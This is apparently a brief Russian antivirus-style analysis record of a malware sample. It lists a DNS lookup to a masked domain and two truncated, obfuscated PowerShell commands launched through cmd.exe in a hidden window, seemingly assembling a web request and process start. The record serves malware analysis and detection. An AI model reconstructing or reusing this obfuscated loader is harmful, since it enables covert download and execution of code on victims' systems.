Техническая информация
- DNS ASK se#####yservice.press
- '<SYSTEM32>\cmd.exe' /c "powershell $wiqirg='^:te';$uzoti='^xe''';$czinxe='^nPo';$kihzez='^ath';$ixsew='^ss ';$opama='^ces';$zaze='^rt-';$ucip='^ew-';$arecz='^ice';$opcunmo='^tio';$ymtaqx='^''ht';$wymja='^-Ex';$hs...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell $wiqirg='^:te';$uzoti='^xe''';$czinxe='^nPo';$kihzez='^ath';$ixsew='^ss ';$opama='^ces';$zaze='^rt-';$ucip='^ew-';$arecz='^ice';$opcunmo='^tio';$ymtaqx='^''ht';$wymja='^-Ex';$hs...